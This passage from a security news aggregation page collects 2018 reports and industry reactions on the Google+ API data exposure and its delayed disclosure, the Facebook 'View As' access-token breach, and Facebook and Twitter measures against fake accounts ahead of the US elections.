- Social Site-

Last update 28.09.2017 14:48:34

Introduction  List  Kategorie  Subcategory  0  1  2  3  4  5  6  7  8



Industry Reactions to Google+ Security Incident: Feedback Friday
14.10.2018 securityweek
Social

Google announced this week that it has decided to shut down its Google+ social network. The announcement also revealed the existence of an API bug that exposed personal information from as many as 500,000 accounts.

According to Google, the flaw gave hundreds of third-party apps access to user information such as name, email address, occupation, gender and age. However, the Internet giant said it had found no evidence of abuse.

Google discovered the bug in March 2018, but waited until now to disclose it, which has raised a lot of questions. The Wall Street Journal reported that Google executives decided not to notify users earlier due to concerns it would attract the attention of regulators and draw comparisons to the Cambridge Analytica data privacy scandal that hit Facebook.

Industry reactions to Google+ security incident

Industry professionals have commented on various aspects of the story, including the vulnerability, legal implications, impact on Google, and how APIs can be secured.

And the feedback begins...

Paul Bischoff, Comparitech:

"In my view, Google is basically pleading ignorance in order to shield itself from legal ramifications. It has conveniently left out some crucial figures in its response that would give us a more clear picture of the scope of this incident. For example, Google says 438 applications had unauthorized access to Google+ profile data, but it doesn't say how many of its users used those apps. And while Google says it performed a cursory investigation and found nothing suspicious, it also notes that it didn't actually contact or audit any of the developers of those apps.

As popular and high-profile as Google is, and due to the fact that this vulnerability existed for the better part of three years, it would be reasonable to assume the number of occurrences in which Google+ data was obtained and misused is non-zero.

Although there's no federal breach notification law in the US, every state now has its own breach notification law. However, these laws only apply when it's clear that data was obtained by an unauthorized third party. By turning a blind eye as to whether this occurred and only acknowledging that a vulnerability existed, Google can plead ignorance."

Ilia Kolochenko, CEO, High-Tech Bridge:

"Unlike the recent Facebook breach, this disclosure timeline is incomprehensibly long and will likely provoke a lot of questions from regulatory authorities. Inability to assess and quantify the users impacted does not exempt from disclosure. Although, a security vulnerability per se does not automatically trigger the disclosure duty, in this case it seems that Google has some reasonable doubts that the flaw could have been exploited. Further clarification from Google and technical details of the incident would certainly be helpful to restore confidence and trust among its users currently abandoned in darkness.

Technically speaking, this is one more colourful example that bug bounty is no silver bullet even with the highest payouts by Google. Application security is a multi-layered approach process that requires continuous improvement and adaptation for new risks and threats. Such vulnerabilities usually require a considerable amount of efforts to be detected, especially if it (re)appears on a system that has been already tested. Continuous and incremental security monitoring is vital to maintain modern web systems secure."

Matt Chiodi, VP of Cloud Security, RedLock:

“Given Google's largely stellar reputation, I am shocked that they would purposefully choose to not disclose this incident. We have learned from similar situations that consumers possess a strong ability to forgive when companies take immediate and demonstrable steps to ensure their mistakes are not repeated. Think about J&J with the Tylenol scandal in the 1980s. Because of their swift response, J&J remains one of the most trusted brands. Google could lose a great deal of respect and ultimately revenue if this report is true.”

Bobby S, Red Team, ThinkMarble:

"The fact that Google chose to shut Google+ down on discovering this breach is telling of how serious it is. It appears that a bug in the API for Google+ had been allowing third-party app developers to access the data not just of users who had granted permission, but of their friends. The vast majority of social media platforms that we use every day monetise our data by making it available to 3rd parties via an API, but it is not acceptable that exploitative practices continue.

This has echoes of the Cambridge Analytica scandal that hit Facebook and has led to much greater scrutiny of Facebook’s policies and openness towards how data is accessed, used and shared. Similarly, Google must seriously consider how it continues to operate alongside third-party developers. This is especially relevant now that the GDPR is in force, affecting any company with users in the EU.

As a data controller, under Article 32 of the GDPR, Google now has greater obligations to ensure that its data-processors (including third-party app developers) implement measures to both ensure the security of personal data, but also gain the proper permissions from individual users to access it. In wake of this new regulation, these same companies also now hold a legal requirement to take appropriate actions to secure and pseudonymize this data before making it available through their services."

Pravin Kothari, CEO, CipherCloud:

“Google’s unofficial motto has long been ‘don’t be evil.’ Alphabet, the Google parent company, adapted this to ‘do the right thing.’

Google’s failure, if true, to not disclose to users the discovery of a bug that gave outside developers access to private data, is a reoccurring theme. We saw recently that Uber was fined for failing to disclose the fact that they had a breach, and instead of disclosing, tried to sweep it under the rug.

It’s not surprising that companies that rely on user data are incented to avoid disclosing to the public that their data may have been compromised, which would impact consumer trust. These are the reasons that the government should and will continue to use in their inexorable march to a unified national data privacy omnibus regulation.

Trust and the cloud do not go together until responsibility is taken for locking down and securing our own data. Even if your cloud offers the ability to enforce data protection and threat protection, it is not their data that is compromised and potentially used against them, it is the consumers.

Enterprises leveraging cloud services need to ensure additional security measures and data is protected before it is delivered to a third-party cloud service - this is the only way we can ensure data is protected.”

Colin Bastable, CEO, Lucy Security:

“Don’t be Evil mutated into Don’t be Caught. Google’s understandable desire to hide their embarrassment from regulators and users is the reason why states and the feds impose disclosure requirements – the knock-on effects of security breaches are immense.

The risk of such a security issue is shared by all of the Google users' employers, banks, spouses, colleagues, etc. But I guess we can trust them when we are told there was no problem.”

Etienne Greeff, CTO and co-founder, SecureData:

The news today that Google covered up a significant data breach, affecting up to 500,000 Google+ users, is unfortunately unsurprising. It’s a textbook example of the unintended consequences of regulation – in forcing companies to comply with tough new security rules, businesses hide breaches and hacks out of fear of being the one company caught in the spotlight.

Google didn’t come clean on the compromise, because they were worried about regulatory consequences. While the tech giant went beyond its “legal requirement in determining whether to provide notice,” it appears that regulation like GDPR is not enough of a deterrent for companies to take the safety of customer data seriously. And so this type of event keeps on happening. While Google has since laid out what it intends to do about the breach in support of affected users, this doesn’t negate the fact that the breach – which happened in March – was ultimately covered up.

However, there are events that are happening far closer to home that aren’t getting the attention they deserve. We seem to pay more attention to the big tech breaches, when businesses such as the supermarket chain Morrisons is undergoing a class action lawsuit against them, for failing to protect deliberately leaked employee data. Last year the High Court ruled that the supermarket was what they termed “vicariously liable” as the Internal Auditor in question was acting in the course of his own employment at the company when he leaked that information online. The implications of this type of action are huge – if businesses can be held accountable for the actions of rogue employees acting criminally, then we will have to treat all our employees as malicious threat actors – which is a huge thing to consider and could have momentous repercussions across the globe in all industries.

Until then, we will undoubtedly see even more of this ‘head-in-the-sand’ practice in the future, especially given GDPR is now in force from larger tech firms. It ultimately gives hackers another way of monetising compromises – just like we saw in the case of Uber. This is dangerous practice, and changes need to be made across the technology industry to make it a safer place for all. Currently, business seems to care far more about covering its own back than the compromise of customer data. It’s a fine line to walk."

Bryan Becker, application security researcher, WhiteHat Security:

“Even giants can have security flaws. I’m sure the offices of Facebook breathed a collective sigh of relief today, as they’re pushed out of the headlines by a new privacy breach at competitor Google.

Breaches like this illustrate the importance of continuous testing and active threat modeling, as well as the attention that APIs require for secure development and least information/privilege principles. Companies like Google grow large and fast, and can have a problem keeping every exposed endpoint under scrutiny. No one person can possibly be aware of every use or permutation of a single piece of code or API, or microservice.

For organizations that already have a large architecture, knowing where and how to start evaluating security can be a challenge in and of itself. In these cases, organizations can benefit from active threat modeling – basically a mapping of all front-end services to any other services they talk to (both backend and frontend), often drawn as a flow-chart type of diagram. With this mapping, admins can visualize what services are public facing (as in, need to be secured and tested), as well as what is at risk if those services get compromised. In some ways, this is the first step to taking ‘inventory’ in the infosec world.

Once the landscape is mapped out, automated testing can take a large portion of the strain by continuously scanning various services – even after they become old. Of course, automated testing is not a be-all/end-all solution, but it does carry the benefit that old or unused-but-not-yet-retired services continue to have visibility by the security team, even after most of the engineering team is no longer paying attention or has moved onto more interesting projects.”

Jessica Ortega, website security analyst, SiteLock:

"Google announced that it will be shutting down its controversial social media network Google+ over the next ten months in the wake of a security flaw. This flaw allowed more than 400 apps using the Google+ API to access the personal information of approximately 500,000 users. The flaw was discovered in March, but Google opted not to disclose this vulnerability as it found no evidence that the information had been misused. Additionally, the decision not to disclose the discovered vulnerability speaks to a fear of reputational damage and possible legal ramifications or litigation in light of recent Senate hearings and GDPR.

This type of behavior may become more common among tech companies aiming to protect their reputation in the wake of legislation and privacy laws--they may choose not to disclose vulnerabilities that they are not legally required to report in order to avoid scrutiny or fines. Ultimately it will be up to users to proactively monitor how their data is used and what applications have access to that data by using strong passwords and carefully reviewing access requests prior to using an app like Google+."

Rusty Carter, VP of Product Management, Arxan Technologies:

“This shows yet again that “free” is anything but free. The cost of many of these services is your privacy and your data. In this case, the situation is even worse. Negligence led to more data exposed than intended, and – as the Wall Street Journal reported - Google did not notify users for months about this issue due to fear of disclosure.

While regional legislation may certainly impact how this proceeds, it is clear that consumer awareness of security is increasing quickly and the long term success of businesses will be heavily dependent on their reputation and consumers trust that they are securing and protecting their private and personal information.”

Kevin Whelan, CTO, ITC Secure:

"From a security standpoint, this again highlights the risks of how personal data can be accessed by third parties – in this case names, email, addresses, ages, occupations and relationship status were accessible through an open API.

From a business standpoint, it’s also a blow as they have had to close the social network, albeit the average touch time was five seconds and was deemed to be unpopular compared to platforms such as Facebook and Twitter. This bug has been around for a long time, so whilst there’s no evidence that data has been misused, it will require forensic investigation. What’s also surprising here is that Google say that they don’t keep logs for more than two weeks so aren’t able see what data had been accessed."

Brian Vecci, Technical Evangelist, Varonis:

“This is a breach almost everyone can relate to, because everyone has a Google account and between emails, calendars, documents and other files, lots of people keep a ton of really valuable data in their Google account -- so unauthorised access could be really damaging. On top of that, when you get access to someone’s primary email—which for many people is Gmail, you’ve got the keys to their online life. Not only do you have their login, which is almost always their email, you have the ability to reset any password since password reset links are sent via email. A Gmail breach could be the most damaging breach imaginable for the most number of people the longer it goes undetected. If Google knew about a potential breach and didn’t report it, that’s a huge red flag.

Unlike many other types of accounts, Google serves for many users as the authentication for other apps like Facebook. Last week, Facebook said they had no evidence that linked apps were accessed. But if these linked apps were accessed due to a breach, it could expose all kinds of personal user data. If you’re using Google or Facebook to login to other apps, there is a whole web of information that could be exposed. Breaches like these are the reason why Google, Facebook and other big tech players need to be regulated - they are a gateway to other applications for business and personal use.”


Facebook Says Hackers Accessed Data of 29 Million Users
14.10.2018 securityweek
Social
Facebook Hack Details

Facebook said Friday that hackers accessed personal data of 29 million users in a breach at the world's leading social network disclosed late last month.

The company had originally said up to 50 million accounts were affected in a cyberattack that exploited a trio of software flaws to steal "access tokens" that enable people to automatically log back onto the platform.

"We now know that fewer people were impacted than we originally thought," Facebook vice president of product management Guy Rosen said in a conference call updating the investigation.

The hackers -- whose identities are still a mystery -- accessed the names, phone numbers and email addresses of 15 million users, he said.

For another 14 million people, the attack was potentially more damaging.

Facebook said cyberattackers accessed that data plus additional information including gender, religion, hometown, birth date and places they had recently "checked in" to as visiting.

No data was accessed in the accounts of the remaining one million people whose "access tokens" were stolen, according to Rosen.

The attack did not affect Facebook-owned Messenger, Messenger Kids, Instagram, WhatsApp, Oculus, Workplace, Pages, payments, third-party apps or advertising or developer accounts, the company said.

Vulnerability in the code

Facebook said engineers discovered a breach on September 25 and had it patched two days later.

That breach allegedly related to a "view as" feature -- described as a privacy tool to let users see how their profiles look to other people. That function has been disabled for the time being as a precaution.

Facebook reset the 50 million accounts believed to have been affected, meaning users would need to sign back in using passwords.

The breach was the latest privacy embarrassment for Facebook, which earlier this year acknowledged that tens of millions of users had their personal data hijacked by Cambridge Analytica, a political firm working for Donald Trump in 2016.

"We face constant attacks from people who want to take over accounts or steal information around the world," chief executive Mark Zuckerberg said on his own Facebook page when the breach was disclosed.

"While I'm glad we found this, fixed the vulnerability, and secured the accounts that may be at risk, the reality is we need to continue developing new tools to prevent this from happening in the first place."

Facebook said it took a precautionary step of resetting "access tokens" for another 40 million accounts which had accessed the "view as" function.

'Seed' accounts

Hackers evidently started the cyber-onslaught on September 14 with 400,000 "seed accounts" they had a hand in or were otherwise close to, according to Rosen.

"The attackers started with a set of accounts they controlled directly, then moved to their friends, and their friend's friends, and so on -- each time taking advantage of the vulnerability," he added.

The exploit allowed hackers to steal copies of access tokens from accounts of "friends" by using the "view as" feature.

Once they had keys to accounts, hackers had the ability to get into them and control them as though they were the real owner.

Hackers could have seen the last four digits of credit card data in people's accounts, with the rest hidden for security, but there was no sign that data was taken, according to Facebook.

Rosen said they found no reason yet to believe hackers were in interested in people's information, rather that it appeared the mission was to harvest access tokens from friends associated with breached accounts.

He declined to discuss progress regarding figuring out who was behind the attack, saying Facebook had been asked by the FBI to remain quiet on the topic.

The California-based social network says it is cooperating with the FBI, US Federal Trade Commission, Irish Data Protection Commission and other authorities regarding the breach.

Rosen said the FBI investigation also limited what he could disclose about what the hackers' end-goal may have been, but maintained that Facebook had "no reason to believe this attack was related to the mid-term elections" in the US.


Facebook Data Breach Update: attackers accessed data of 29 Million users
13.1.0218 securityaffairs 
Social

Facebook data breach – The company provided an updated for the data breach it disclosed at the end of September, hackers accessed personal data of 29 million users.
Facebook announced that hackers accessed data of 29 Million users, a number that is less than initially thought of 50 million.

The hackers did not access did not affect Facebook-owned Messenger, Messenger Kids, Instagram, WhatsApp, Oculus, Workplace, Pages, payments, third-party apps or advertising or developer accounts, the company said.

Attackers exploited a vulnerability in the “View As” feature that allowed them to steal Facebook access tokens of the users, it allows users to see how others see their profile.

Earlier this month Facebook revealed attackers chained three bugs to breach into the Facebook platform.

“We now know that fewer people were impacted than we originally thought,” said Facebook vice president of product management Guy Rosen in a conference call.

Attackers accessed the names, phone numbers and email addresses of 15 million users, while for another 14 million users hackers also accessed usernames, profile details (i.e. gender, relationship status, hometown, birthdate, city, and devices), and their 15 most recent searches.

For the remaining one million users affected by the Facebook Data Breach whose “access tokens” were stolen, no data was accessed.

The hackers started on September 14 with 400,000 “seed accounts” they were controlling directly then they expanded their activity to their networks.

“First, the attackers already controlled a set of accounts, which were connected to Facebook friends. They used an automated technique to move from account to account so they could steal the access tokens of those friends, and for friends of those friends, and so on, totaling about 400,000 people.” Rosen added.

“In the process, however, this technique automatically loaded those accounts’ Facebook profiles, mirroring what these 400,000 people would have seen when looking at their own profiles. That includes posts on their timelines, their lists of friends, Groups they are members of, and the names of recent Messenger conversations. Message content was not available to the attackers, with one exception. If a person in this group was a Page admin whose Page had received a message from someone on Facebook, the content of that message was available to the attackers.”

Facebook is cooperating with the US authorities, the Irish Data Protection Commission and other authorities regarding the breach.

Rosen confirmed Facebook had “no reason to believe this attack was related to the mid-term elections” in the US.


Facebook Purges 251 Accounts to Thwart Deception
12.10.2018 securityweek
Social

Facebook on Thursday said it shut down 251 accounts for breaking rules against spam and coordinated deceit, some of it by ad farms pretending to be forums for political debate.

The move came as the leading social network strives to prevent the platform from being used to sow division and spread misinformation ahead of US elections in November.

Facebook removed 559 pages and 251 accounts that consistently violated rules against spam and "coordinated inauthentic behavior," according to an online post by cybersecurity policy chief Nathaniel Gleicher and product manager Oscar Rodriguez.

"Many were using fake accounts or multiple accounts with the same names and posted massive amounts of content across a network of Groups and Pages to drive traffic to their websites," they said.

"Many used the same techniques to make their content appear more popular on Facebook than it really was."

Other pages and accounts shut down were "ad farms" using Facebook to trick people into thinking they were forums for legitimate political debate, according to Gleicher and Rodriguez.

Facebook is getting a "war room" up and running on its Silicon Valley campus to quickly repel efforts to use the social network to meddle in upcoming elections in the US and Brazil.

Teams at Facebook have been honing responses to potential scenarios such as floods of bogus news or campaigns to trick people into falsely thinking they can cast ballots by text message, according to executives.

Facebook is keen to prevent the kinds of voter manipulation or outright deception that took place ahead of the 2016 election the brought US President Donald Trump to office.

Facebook is better prepared to defend against efforts to manipulate the platform to influence elections and has recently thwarted foreign influence campaigns targeting several countries, chief executive Mark Zuckerberg said recently in a post on the social network.

Facebook has started showing who is behind election-related online ads, and have shut down accounts involved in coordinated stealth influence campaigns.

With the help of artificial intelligence software, Facebook blocked nearly 1.3 billion fake accounts between March and October of last year, according to the social network.


Google Says Social Network Bug Exposed Private Data
9.10.2018 securityweek
Social

Google announced Monday it is shutting down the consumer version of its online social network after fixing a bug exposing private data in as many as 500,000 accounts.

The US internet giant said it will "sunset" the Google+ social network for consumers, which failed to gain meaningful traction after being launched in 2011 as a challenge to Facebook.

A Google spokesperson cited "significant challenges in creating and maintaining a successful Google+ that meets consumers' expectations" along with "very low usage" as the reasons for the move.

In March, a security audit revealed a software bug that gave third-party apps access to Google+ private profile data that people meant to share only with friends.

Google said it was unable to confirm which accounts were affected by the bug, but an analysis indicated it could have been as many as 500,000 Google+ accounts.

"We found no evidence that any developer was aware of this bug, or abusing the API, and we found no evidence that any profile data was misused," Google said in a blog post.

It was referring to application programming interface software for the social network.

The data involved was limited to optional profile fields, including name, age, gender, occupation and email address, Google said.

Information that could be accessed did not include posts, messages or telephone numbers, a spokesperson said.

Google did not specify how long the software flaw existed, or why it waited to disclose it.

The Wall Street Journal reported that Google executives opted against notifying users earlier because of concerns it would catch the attention of regulators and draw comparisons to a data privacy scandal at Facebook.

Earlier this year, Facebook acknowledged that tens of millions of users had personal data hijacked by Cambridge Analytica, a political firm working for Donald Trump in 2016.

"Every year, we send millions of notifications to users about privacy and security bugs and issues," a Google spokesman told AFP.

"Whenever user data may have been affected, we go beyond our legal requirements and apply several criteria focused on our users in determining whether to provide notice."

The company said it determined its course of action based on the data involved in the breach, lack of evidence of misuse and whether it could accurately determine which users to inform.


Google was aware of a flaw that exposed over 500,000 of Google Plus users, but did not disclose it
9.10.2018 securityaffairs
Social

This is a very bad news for Google that suffered a massive data breach that exposed the private data of over 500,000 of Google Plus users to third-party developers.
As a consequence of the data exposure, the company is going to shut down the social media network Google+.

The root cause of the data breach is a security vulnerability affecting one of Google+ People APIs that allowed third-party developers to access data for more than 500,000 users.

Exposed data include including usernames, email addresses, occupation, date of birth, profile photos, and gender-related information.

The worse aspect of the story is that the company did not disclose the flaw in the Google+ when it first discovered the issue in this spring because it feared regulatory scrutiny and reputational damage.

“Google exposed the private data of hundreds of thousands of users of the Google+ social network and then opted not to disclose the issue this past spring, in part because of fears that doing so would draw regulatory scrutiny and cause reputational damage, according to people briefed on the incident and documents reviewed by The Wall Street Journal.” reported the Wall Street Journal.

“As part of its response to the incident, the Alphabet Inc. unit on Monday announced a sweeping set of data privacy measures that include permanently shutting down all consumer functionality of Google+.”

Google declared that its experts immediately addressed this vulnerability in March 2018 and that they have found no evidence that any developer has exploited the flaw to access users data. The flaw was present in the Google+ People APIs since 2015.

“We discovered and immediately patched this bug in March 2018. We believe it occurred after launch as a result of the API’s interaction with a subsequent Google+ code change.” reads a blog post published by Google.

“We made Google+ with privacy in mind and therefore keep this API’s log data for only two weeks. That means we cannot confirm which users were impacted by this bug. However, we ran a detailed analysis over the two weeks prior to patching the bug, and from that analysis, the Profiles of up to 500,000 Google+ accounts were potentially affected. Our analysis showed that up to 438 applications may have used this API.”

Google_Plus

The choice of not disclosing the vulnerability was probably influenced by the Cambridge Analytica scandal that was occurring in the same period.

“A memo reviewed by the Journal prepared by Google’s legal and policy staff and shared with senior executives warned that disclosing the incident would likely trigger “immediate regulatory interest” and invite comparisons to Facebook’s leak of user information to data firm Cambridge Analytica.” continues the WSJ.

Experts believe that the vulnerability in Google+ is similar to the one recently discovered in Facebook API.

Google will maintain Google+ only for Enterprise users starting from August 2019.

Google also provided information about the Project Strobe program that has seen a privacy internal task force conducting a companywide audit of the company’s APIs in recent months.

“In a blog post on Monday, Google said it plans to clamp down on the data it provides outside developers through APIs. The company will stop letting most outside developers gain access to SMS messaging data, call log data and some forms of contact data on Android phones, and Gmail will only permit a small number of developers to continue building add-ons for the email service, the company said.” concludes the WSJ.
“The coming changes are evidence of a larger rethinking of data privacy at Google, which has in the past placed relatively few restrictions on how external apps access users’ data, provided those users give permission. Restricting access to APIs will hurt some developers who have been helping Google build a universe of useful apps.”


Facebook Says No Apps Were Accessed in Recent Hack
4.10.2018 securityweek
Social

Facebook has shared another update on the hacker attack disclosed last week. The social media giant says there is no evidence that the attackers accessed any third-party apps.

Facebook revealed on September 28 that it had reset the access tokens for 90 million accounts, including 50 million that were directly impacted and 40 million deemed at risk.

Hackers obtained access tokens for nearly 50 million accounts after exploiting three distinct bugs in the View As feature, which shows users how others see their profile, and a video uploader interface introduced in July 2017. The vulnerability was patched and Facebook informed users in its initial blog post that it had found no evidence of misuse, but noted that its investigation is ongoing.

The company admitted that the attackers could have accessed not only Facebook accounts with the compromised tokens, but also third-party apps that use Facebook login. Resetting the tokens eliminated the risk of unauthorized access to these applications, but Facebook still had to figure out if any apps were accessed during the attack.

A blog post published by the company on Tuesday said there was no evidence of unauthorized access to apps based on an analysis of logs for all third-party apps installed or logged in during the attack.

Facebook has also created a tool to help developers determine if any of their users have been impacted.

“Any developer using our official Facebook SDKs — and all those that have regularly checked the validity of their users’ access tokens – were automatically protected when we reset people’s access tokens,” explained Guy Rosen, VP of Product Management at Facebook. “However, out of an abundance of caution, as some developers may not use our SDKs — or regularly check whether Facebook access tokens are valid — we’re building a tool to enable developers to manually identify the users of their apps who may have been affected, so that they can log them out.”

Facebook has advised developers to use its official SDKs for Android, iOS and JavaScript as these automatically check the validity of access tokens, and log their users out of the app when error codes show an invalid session.

Facebook has yet to provide any information on the attackers and their motives, and the attack does not appear to be targeted at a specific country or region.

The social media giant faces lawsuits and government investigations as a result of the incident, and the company’s stock has been steadily falling since the disclosure of the breach. It dropped from nearly $169 on September 27 to just over $159 on Tuesday.


New Twitter Rules Target Fake Accounts, Hackers
2.10.2018 securityweek
Social

Twitter on Monday announced that it has made some changes in preparation for the upcoming midterm elections in the United States. The changes include updated rules that target fake accounts and hackers.

Social media companies have been criticized for allowing their platforms to be abused for influence campaigns ahead of the 2016 presidential election in the U.S. In response, Twitter, Facebook and Google have started taking steps to neutralize these types of operations, particularly by blocking accounts used to spread false information in an effort to manipulate users.

Twitter has now announced some updates on what it described as its “elections integrity efforts,” including changes to the Twitter rules.Twitter updates rules ahead of elections

The updated Twitter rules target three main issues, and one of them is fake accounts. The social media giant – based on feedback from users – has decided to suspend not just accounts involved in spam campaigns, but also accounts “engaged in a variety of emergent, malicious behaviors.”

The company plans on identifying fake accounts based on several factors, including the use of stock or stolen profile photos, the use of copied profile descriptions, and intentionally misleading profile information, such as location.

The second key issue targeted by the updated rules is related to “attributed activity.” Twitter will now crack down on accounts that it can reliably link to entities known to have violated its rules. This includes accounts that mimic or aim to replace previously suspended accounts.

Finally, Twitter is targeting accounts that distribute hacking-related materials. Until now, it prohibited the distribution of private information, trade secrets or materials that could cause harm to individuals. The rules have now been expanded to include users that take responsibility for a cyberattack, and ones that make threats or offer incentives to hack specific accounts.

“Commentary about a hack or hacked materials, such as news articles discussing a hack, are generally not considered a violation of this policy,” Twitter representatives wrote in a blog post.

Twitter claims its previously implemented measures are already paying off. The company says it recently removed roughly 50 accounts falsely claiming to be associated with the U.S. Republican party.

“We have also taken action on Tweets sharing media regarding elections and political issues with misleading or incorrect party affiliation information. We continue to partner closely with the RNC, DNC, and state election institutions to improve how we handle these issues,” Twitter said.

The company also pointed out that it recently closed 770 Iran-linked accounts engaging in coordinated manipulation, it challenged millions of potential spam accounts, and it removed hundreds of thousands of apps and tightened access to its API.

Twitter also announced some updates that impact users’ timeline. The company wants to ensure that users receive the most relevant information related to the elections and it’s making it easier for users to identify legitimate candidate accounts. Candidates are being offered increased support and advised to enable two-factor authentication on their account for better security.


Several Bugs Exploited in Massive Facebook Hack
2.10.2018 securityweek
Social

Facebook Shares More Details on Hack Affecting 50 Million Accounts

Facebook Shares More Details About Hack Affecting 50 Million Accounts

Facebook has shared additional details about the hacker attack affecting 50 million accounts, including technical information and what its investigation has uncovered so far.

The social media giant announced on Friday that malicious actors exploited a vulnerability related to the “View As” feature to steal access tokens that could have been leveraged to hijack accounts. The tokens of nearly 50 million users have been compromised.

The tokens of these users have been reset to prevent abuse, along with the tokens of 40 million others who may be at risk due to the fact that they were subject to a View As lookup in the past year – impacted users will need to log back in to their accounts. The problematic feature has been suspended until a security review is conducted.

Technical details on Facebook hack

The “View As” feature shows users how others see their profile. This is a privacy feature designed to help users ensure that they only share information and content with the intended audience.

The vulnerability that exposed access tokens involved a combination of three distinct bugs affecting the “View As” feature and a version of Facebook’s video uploader interface introduced in July 2017.

When “View As” is used, the profile should be displayed as a read-only interface. However, the text box that allows people to wish happy birthday to their friends erroneously allowed users to post a video – this was the first bug.

When posting a video in the affected box, the video uploader generated an access token that had the permissions of the Facebook mobile app – this was the second bug as the video uploader should not have generated a token at this point.

The third and final problem was that the generated token was not for the user who had been using “View As” but for the individual whose profile was being looked up.

Hackers could obtain the token from the page’s HTML code, and use it access the targeted user’s account. An attacker would first have to target one of their friends’ account and move from there to other accounts. The attack did not require any user interaction.

“The attackers were then able to pivot from that access token to other accounts, performing the same actions and obtaining further access tokens,” explained Pedro Canahuati, VP of Engineering, Security and Privacy at Facebook.

Users and information affected by the breach

Facebook says the vulnerability has been patched. The social media giant claims that while the attackers did try to query its APIs to access profile information – such as name, gender and hometown – there is no evidence that any private information was actually accessed.

Facebook’s investigation continues, but the company says it has found no evidence that the attackers accessed private messages or credit card information.

Facebook says impacted users are from all around the world – it does not appear that the attack was aimed at a specific country or region. It’s worth noting that Facebook founder and CEO, Mark Zuckerberg, and Sheryl Sandberg, the company’s COO, were among those affected.

Another noteworthy issue is that the exposed tokens can be used not only to access Facebook accounts, but also third-party apps that use Facebook login. However, the risk should be eliminated now that the existing tokens have been reset.

Users who have linked Facebook to an Instagram account will need to unlink and relink their accounts due to the tokens being reset. Facebook clarified that WhatsApp is not impacted.

Facebook is alerting users whose tokens have been compromised by sending notifications to their accounts. In some cases, users can check if their accounts were actually hacked by accessing the “Security and Login” page from the Settings menu. However, access is only logged if the attacker created a full web session.

Incident timeline and information on attackers

Facebook discovered the breach following an investigation that started on September 16, after noticing a traffic spike, specifically increased user access to the website. However, it only realized that it was dealing with an attack on September 25, when it also identified the vulnerability. Affected users were notified and had their access tokens reset beginning with Thursday, September 27.

As for the attackers, no information has been shared, but the social media firm did note that exploitation of the vulnerability is complex and it did require a certain skill level.

Impact on Facebook

The company says it has notified the FBI and law enforcement. While the company has responded quickly after the breach was discovered, MarketWatch reports that the Data Protection Commission in Ireland, Facebook's main privacy regulator in Europe, could fine the company as much as $1.64 billion under the recently introduced GDPR.

U.S. Senator Mark R. Warner responded to news of the Facebook hack, asking for a full investigation.

“Today’s disclosure is a reminder about the dangers posed when a small number of companies like Facebook or the credit bureau Equifax are able to accumulate so much personal data about individual Americans without adequate security measures,” Sen. Warner said. “This is another sobering indicator that Congress needs to step up and take action to protect the privacy and security of social media users. As I’ve said before – the era of the Wild West in social media is over.”

FTC Commissioner Rohit Chopra wrote on Twitter that he wants answers.

Despite no evidence of harm to any user, a class action lawsuit has already been filed against Facebook in the United States.

Facebook stock fell 3 percent after the breach was disclosed.


The Scandals Bedevilling Facebook
2.10.2018 securityweek
Social

Facebook is at the centre of controversy yet again after admitting that up to 50 million accounts were breached by hackers.

Facebook chief executive Mark Zuckerberg said engineers discovered the breach on Tuesday, and patched it on Thursday night.

"We don't know if any accounts were actually misused," Zuckerberg said. "We face constant attacks from people who want to take over accounts or steal information around the world."

Facebook reset the 50 million breached accounts, meaning users will need to sign back in using passwords. It also reset "access tokens" for another 40 million accounts as a precautionary measure.

Here is a roundup of the scandals dogging the social media giant.

- Cambridge Analytica -

In Facebook's telling, everything goes back to 2013 when Russian-American researcher Aleksandr Kogan creates a personality prediction test app, "thisisyourdigitallife", which is offered on the social network.

Around 300,000 people download the app, authorising access to information on their profile and also to the data of their Facebook friends.

In 2015 Facebook makes changes to its privacy policy and prevents third-party apps from accessing the data of users' friends without their consent.

The same year the social network discovers Kogan has passed on the information retrieved via his app to the British company Cambridge Analytica (CA), which specialises in the analysis of data and strategic communication.

In 2016 CA is hired by Donald Trump's US presidential campaign.

Facebook says it was assured by CA in 2015 that the data in question had been erased. But it estimates the firm could have had access to the data of up to 87 million users, most in the United States, without their consent, and mined this information to serve the Trump campaign.

Cambridge Analytica, which denies the accusations, has since filed for voluntary bankruptcy in the United States and Britain.

Facebook is accused of having been lax in its protection of user data, slow to intervene and consistently vague on its privacy settings.

In 2011 it signed a consent decree with US consumer protection agency the Federal Trade Commission (FTC) settling charges that it deceived consumers by telling them they could keep their information on Facebook private, and then allowing it to be shared and made public.

In March this year the FTC said it had opened an inquiry into Facebook's privacy practices, including whether the company violated the earlier agreement, which would incur hefty fines.

Beyond the CA scandal, Facebook estimates the data of nearly all its users may have, at some time, been retrieved without their knowledge.

- Political manipulation -

Facebook and sites like Google, Twitter and Tumblr are also accused of having allowed the spread through their networks of "fake news", including to manipulate public opinion ahead of the US election in favour of Trump.

The sites have acknowledged finding on their platforms messages, accounts and pages associated with the Internet Research Agency, a Saint Petersburg operation that is alleged to be a "troll farm" connected to the Russian government.

It is accused of spreading disinformation and propaganda including via postings -- often in the form of sponsored ads that target users based on their personal data -- that could influence opinion, for example over immigration.

According to Facebook, more than 120 million users had seen such content.

Facebook is in particular accused of not having been vigilant enough on monitoring the content and authenticity of pages and political ads that it carries.

It announced this year that it will require that the sponsors of political ads are identified and verified.

Earlier this month, Zuckerberg said Facebook was better prepared to defend against efforts to manipulate the platform to influence elections.

"We've identified and removed fake accounts ahead of elections in France, Germany, Alabama, Mexico and Brazil," Zuckerberg said.

"We've found and taken down foreign influence campaigns from Russia and Iran attempting to interfere in the US, UK, Middle East, and elsewhere -- as well as groups in Mexico and Brazil that have been active in their own country."


Industry Reactions to Facebook Hack
2.10.2018 securityweek
Social

Industry reactions to Facebook hackingFacebook revealed last week that malicious actors may have obtained access tokens for 50 million accounts after exploiting several bugs related to the “View As” feature and a video uploader introduced last year.

The breach was discovered last week following an investigation triggered by a traffic spike observed on September 16. Facebook says it has patched the vulnerability and there is no evidence that the compromised access tokens have been misused.

The incident, the latest in a series of security and privacy scandals involving the social media giant, could have serious repercussions for Facebook. The company’s stock went down, and it faces probes by government authorities, class action lawsuits, and a fine that could exceed $1.6 billion.

Industry professionals have commented on various aspects of the incident, including GDPR implications, the impact on Facebook and its users, the vulnerabilities exploited by the attackers, and the company’s response.

And the feedback begins...

Jeannie Warner, security manager, WhiteHat Security:

